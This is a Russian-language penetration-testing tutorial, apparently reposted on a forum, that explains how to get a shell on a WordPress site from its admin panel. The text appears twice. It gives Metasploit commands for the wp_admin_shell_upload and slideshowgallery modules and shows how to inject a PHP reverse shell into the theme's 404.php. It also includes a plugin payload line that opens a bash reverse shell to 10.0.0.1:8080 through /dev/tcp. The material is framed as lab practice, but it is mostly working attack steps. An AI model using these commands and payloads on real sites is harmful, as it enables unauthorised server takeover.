Этот пост связан с тестированием безопасности WordPress для определения возможности использования WordPress путем компрометации консоли администратора.
Содержание
Хост-машина: WordPress
Злоумышленник: Kali Linux
Учетные данные WordPress: admin: admin (в нашем случае)
Давайте начнем!!
Как вы можете заметить, у меня есть доступ к консоли администратора WordPress через веб-браузер, для получения веб-оболочки нам необходимо использовать эту CMS. Существует несколько способов использования WordPress, давайте перейдем к некоторым операциям.
Metasploit Framework
Самый первый метод, который у нас есть, - это Metasploit. Этот модуль принимает имя пользователя и пароль администратора, входит в административную панель и загружает полезные данные, упакованные в виде плагина WordPress. Поскольку это аутентифицированное выполнение кода по проекту, он должен работать на всех версиях WordPress и, как результат, он даст сеанс meterpreter веб-сервера.
Это срабатывает, и вы можете видеть, что у нас было обратное соединение с веб-сервером через сеанс meterpreter.
Внедрение вредоносного кода в WP_Theme
Есть также вторая техника, которая позволяет вам создавать оболочки веб-сервера. Если у вас есть имя пользователя и пароль для администратора, войдите в панель администратора и внедрите вредоносный код PHP в качестве темы WordPress.
Войдите в WP_dashboard и откройте вкладку appearance.
Теперь перейдите к теме twenty fifteen ь выбрав шаблон в 404.php
Вы видите текстовую область для редактирования шаблона, введите свой вредоносный php-код здесь, чтобы получить обратное соединение с веб-сервером.
Чтобы продолжить, мы использовали обратную оболочку PHP (By Penetstmonkey). А затем мы скопировали вышеупомянутый php-reverse-shell и вставили его в шаблон WordPress 404.php, как показано на рисунке ниже. Мы изменили IP-адрес на наш текущий IP-адрес и ввели любой порт, который вы хотите, и запустили прослушиватель netcat для получения обратного соединения.
Обновите файл и просмотрите следующий URL, чтобы запустить введенный код php.
У вас будет сеанс после выполнения файла 404.php. Для доступа к netcat используйте следующую команду:
Загрузить уязвимый WP_Plugin
Некоторым пользователям при входе в систему не предоставляется доступ для записи для внесения изменений в тему WordPress, поэтому мы выбираем «Внедрить WP Plugin вредонос» в качестве альтернативы стратегии получения веб-оболочки.
Таким образом, получив доступ к панели управления WordPress, вы можете попытаться установить вредоносный плагин. Здесь я уже скачал уязвимый плагин из exploit db.
Нажмите
Так как у нас есть zip-файл, и теперь пришло время загрузить плагин.
Dashboard > plugins > upload plugin
Просмотрите загруженный файл как показано.
Как только пакет будет успешно установлен, нам нужно активировать плагин.
Когда все хорошо настроено, тогда приступайте к эксплуатации. Так как мы установили уязвимый плагин с именем «reflex-gallery», и его легко использовать.
Вы воспользуетесь этой уязвимостью в среде Metasploit, загрузите модуль и выполните следующую команду:
Поскольку вышеупомянутые команды будут выполнены, у вас будет получен сеанс meterpreter. Как показано в этой статье, существует несколько способов использования веб-сайта на платформе WordPress.
Внедрить вредоносный плагин
Как вы видели выше, мы загрузили уязвимый плагин, с доступным експлойтом. Но на этот раз мы собираемся внедрить наш сгенерированный вредоносный плагин для получения обратной оболочки.
Это довольно просто, поскольку мы сохранили вредоносный код для обратной оболочки внутри php-файла с именем «revshell.php» и сжали файл в формате zip.
Повторите тот же шаг, что и выше, для загрузки файла плагина «revshell.zip» и запустите прослушиватель netcat, чтобы получить обратное соединение с целевой машиной.
Как только пакет будет успешно установлен, нам нужно активировать плагин.
Как только вы активируете плагин, он будет через обратное соединение как сеанс netcat.
Источник:
Содержание
- Metasploit Framework
- Внедрение вредоносного кода в WP_Theme
- Загрузить уязвимую WP_Pulgin
- Внедрить вредоносный плагин
Хост-машина: WordPress
Злоумышленник: Kali Linux
Учетные данные WordPress: admin: admin (в нашем случае)
Давайте начнем!!
Как вы можете заметить, у меня есть доступ к консоли администратора WordPress через веб-браузер, для получения веб-оболочки нам необходимо использовать эту CMS. Существует несколько способов использования WordPress, давайте перейдем к некоторым операциям.
Metasploit Framework
Самый первый метод, который у нас есть, - это Metasploit. Этот модуль принимает имя пользователя и пароль администратора, входит в административную панель и загружает полезные данные, упакованные в виде плагина WordPress. Поскольку это аутентифицированное выполнение кода по проекту, он должен работать на всех версиях WordPress и, как результат, он даст сеанс meterpreter веб-сервера.
Код:
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
Внедрение вредоносного кода в WP_Theme
Есть также вторая техника, которая позволяет вам создавать оболочки веб-сервера. Если у вас есть имя пользователя и пароль для администратора, войдите в панель администратора и внедрите вредоносный код PHP в качестве темы WordPress.
Войдите в WP_dashboard и откройте вкладку appearance.
Теперь перейдите к теме twenty fifteen ь выбрав шаблон в 404.php
Вы видите текстовую область для редактирования шаблона, введите свой вредоносный php-код здесь, чтобы получить обратное соединение с веб-сервером.
Чтобы продолжить, мы использовали обратную оболочку PHP (By Penetstmonkey). А затем мы скопировали вышеупомянутый php-reverse-shell и вставили его в шаблон WordPress 404.php, как показано на рисунке ниже. Мы изменили IP-адрес на наш текущий IP-адрес и ввели любой порт, который вы хотите, и запустили прослушиватель netcat для получения обратного соединения.
Обновите файл и просмотрите следующий URL, чтобы запустить введенный код php.
http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
У вас будет сеанс после выполнения файла 404.php. Для доступа к netcat используйте следующую команду:
Загрузить уязвимый WP_Plugin
Некоторым пользователям при входе в систему не предоставляется доступ для записи для внесения изменений в тему WordPress, поэтому мы выбираем «Внедрить WP Plugin вредонос» в качестве альтернативы стратегии получения веб-оболочки.
Таким образом, получив доступ к панели управления WordPress, вы можете попытаться установить вредоносный плагин. Здесь я уже скачал уязвимый плагин из exploit db.
Нажмите
Ссылка скрыта от гостей
чтобы скачать плагин для практики.Так как у нас есть zip-файл, и теперь пришло время загрузить плагин.
Dashboard > plugins > upload plugin
Просмотрите загруженный файл как показано.
Как только пакет будет успешно установлен, нам нужно активировать плагин.
Когда все хорошо настроено, тогда приступайте к эксплуатации. Так как мы установили уязвимый плагин с именем «reflex-gallery», и его легко использовать.
Вы воспользуетесь этой уязвимостью в среде Metasploit, загрузите модуль и выполните следующую команду:
Код:
use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts 192.168.1.101
set targeturi /wordpress
exploit
Внедрить вредоносный плагин
Как вы видели выше, мы загрузили уязвимый плагин, с доступным експлойтом. Но на этот раз мы собираемся внедрить наш сгенерированный вредоносный плагин для получения обратной оболочки.
Это довольно просто, поскольку мы сохранили вредоносный код для обратной оболочки внутри php-файла с именем «revshell.php» и сжали файл в формате zip.
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")
Повторите тот же шаг, что и выше, для загрузки файла плагина «revshell.zip» и запустите прослушиватель netcat, чтобы получить обратное соединение с целевой машиной.
Как только пакет будет успешно установлен, нам нужно активировать плагин.
Как только вы активируете плагин, он будет через обратное соединение как сеанс netcat.
Источник:
Ссылка скрыта от гостей
Последнее редактирование: